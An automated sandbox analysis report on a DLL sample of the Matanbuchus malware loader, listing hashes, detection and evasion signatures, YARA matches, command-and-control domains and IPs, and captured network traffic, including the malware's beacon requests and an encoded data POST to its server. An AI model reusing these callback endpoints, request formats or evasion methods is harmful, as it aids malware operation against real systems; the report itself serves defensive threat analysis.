Windows Analysis Report
useraccount.aspx.dll

Overview

General Information

Sample name: useraccount.aspx.dll
Analysis ID: 1521032
MD5: e6092582959219117440fbdd77d2cc53
SHA1: 2722f891bf534e763b5b742b7e5ece905ab35137
SHA256: 7f66770624e2d4bd51029a71cf7311cb873ee6fff6a694e4235577d0322a9937
Tags: dll, Matanbuchus, user-NDA0E

Detection

Matanbuchus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Matanbuchus
AI detected suspicious sample
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Sigma detected: Potentially Suspicious Malware Callback Communication
Uses known network protocols on non-standard ports
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: Matanbuchus
Description: According to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections. Since it is used as a MaaS, both the malware it infiltrates into systems, and the attack reasons can vary - depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus

AV Detection

Source: baruopas.com Virustotal: Detection: 5%
Source: sumonare.com Virustotal: Detection: 5%
Source: https://sumonare.com/ Virustotal: Detection: 5%
Source: https://sumonare.com/projects/index.aspx Virustotal: Detection: 6%
Source: https://baruopas.com/projects/useraccount.aspx Virustotal: Detection: 5%
Source: C:\Users\user\8f08\user-PC\user-PC.ocx ReversingLabs: Detection: 18%
Source: C:\Users\user\8f08\user-PC\user-PC.ocx Virustotal: Detection: 27%
Source: useraccount.aspx.dll Virustotal: Detection: 27%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: useraccount.aspx.dll Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
Source: unknown HTTPS traffic detected: 194.67.193.13:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49770 version: TLS 1.2

Networking

Source: Network traffic Suricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.7:49710 -> 194.67.193.12:4433
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 194.67.193.12 443
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 194.67.193.13 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49821
Source: global traffic TCP traffic: 192.168.2.7:49710 -> 194.67.193.12:4433
Source: Joe Sandbox View ASN Name: IHOR-ASRU IHOR-ASRU
Source: Joe Sandbox View ASN Name: IHOR-ASRU IHOR-ASRU
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDF1D60 socket,gethostbyname,connect,send,recv,std::ios_base::_Ios_base_dtor, 13_2_7EDF1D60
Source: global traffic HTTP traffic detected: GET /projects/useraccount.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: baruopas.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /projects/index.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: sumonare.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /projects/index.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: sumonare.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /projects/index.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: sumonare.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /projects/index.aspx HTTP/1.1 User-Agent: Microsoft-WNS/11.0 Host: sumonare.com Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: baruopas.com
Source: global traffic DNS traffic detected: DNS query: sumonare.com
Source: unknown HTTP traffic detected: POST /projects/cloud-solutions/api-v2/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: sumonare.com Content-Length: 521 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6a 42 36 54 43 39 42 55 31 4a 46 5a 33 67 79 4d 55 74 68 63 54 68 73 62 47 4d 39 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6b 68 6b 56 6c 46 77 51 53 49 36 49 6e 70 6f 61 6d 4e 46 5a 33 67 30 64 6d 70 35 59 79 49 73 49 6c 46 47 57 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 55 78 5a 55 35 5a 62 47 73 34 49 69 77 69 55 6d 4a 76 64 43 49 36 49 6a 4a 44 53 48 4a 48 51 33 68 5a 62 55 46 35 5a 79 49 73 49 6c 4e 69 57 6c 64 75 57 43 49 36 49 6e 64 70 5a 6a 46 5a 62 45 6b 32 4e 33 63 39 50 53 49 73 49 6c 6c 72 53 6c 63 69 4f 6c 73 69 64 32 64 6d 56 69 4a 64 4c 43 4a 6a 5a 6b 74 59 49 6a 6f 69 64 58 63 39 50 53 49 73 49 6d 68 4f 62 33 5a 4b 62 53 49 36 49 6e 68 6e 50 54 30 69 4c 43 4a 76 51 6e 56 4e 56 58 55 69 4f 69 49 32 55 6e 70 58 55 46 49 35 64 58 4e 70 63 57 49 69 4c 43 4a 7a 64 48 56 5a 49 6a 6f 69 64 44 45 72 51 56 6c 6e 50 54 30 69 4c 43 4a 32 62 30 70 6a 49 6a 6f 69 4b 31 46 49 65 6b 31 42 50 54 30 69 4c 43 4a 33 51 57 4e 49 49 6a 6f 69 65 56 46 6d 57 45 31 6e 59 7a 55 72 56 32 35 6c 55 33 4d 72 61 43 49 73 49 6e 64 52 5a 56 4a 49 49 6a 6f 69 64 56 5a 78 57 6b 56 52 53 69 73 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d Data Ascii:
data=eyJBbldGaCI6IjB6TC9BU1JFZ3gyMUthcThsbGM9IiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsIkhkVlFwQSI6InpoamNFZ3g0dmp5YyIsIlFGWnlpaVVYWSI6InUxZU5ZbGs4IiwiUmJvdCI6IjJDSHJHQ3hZbUF5ZyIsIlNiWlduWCI6IndpZjFZbEk2N3c9PSIsIllrSlciOlsid2dmViJdLCJjZktYIjoidXc9PSIsImhOb3ZKbSI6InhnPT0iLCJvQnVNVXUiOiI2UnpXUFI5dXNpcWIiLCJzdHVZIjoidDErQVlnPT0iLCJ2b0pjIjoiK1FIek1BPT0iLCJ3QWNIIjoieVFmWE1nYzUrV25lU3MraCIsIndRZVJIIjoidVZxWkVRSisiLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
Source: rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sumonare.com/
Source: rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sumonare.com/projects/index.aspx
Source: rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sumonare.com/projects/index.aspxh=
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown HTTPS traffic detected: 194.67.193.13:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49770 version: TLS 1.2

System Summary

Source: useraccount.aspx.dll, type: SAMPLE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: sslproxydump.pcap, type: PCAP Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 36.2.regsvr32.exe.7f0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 36.2.regsvr32.exe.7f0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 13.2.rundll32.exe.7ed90000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 13.2.rundll32.exe.7ed90000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 13.2.rundll32.exe.7ed90000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 13.2.rundll32.exe.7ed90000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 36.2.regsvr32.exe.7f0b0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 36.2.regsvr32.exe.7f0b0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 18.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 13.2.rundll32.exe.6cef0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 22.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 18.2.rundll32.exe.7f770000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 18.2.rundll32.exe.7f770000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 36.2.regsvr32.exe.6b4a0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 13.2.rundll32.exe.52c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 18.2.rundll32.exe.7f770000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 18.2.rundll32.exe.7f770000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 13.2.rundll32.exe.52c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000024.00000002.1655827113.000000006B4A1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000D.00000002.2509711565.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000D.00000002.2508577528.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000012.00000002.1539682378.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000024.00000002.1655732587.00000000050B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000024.00000002.1655732587.00000000050B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000012.00000002.1539552118.0000000004B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000012.00000002.1539552118.0000000004B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000016.00000002.1663869871.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
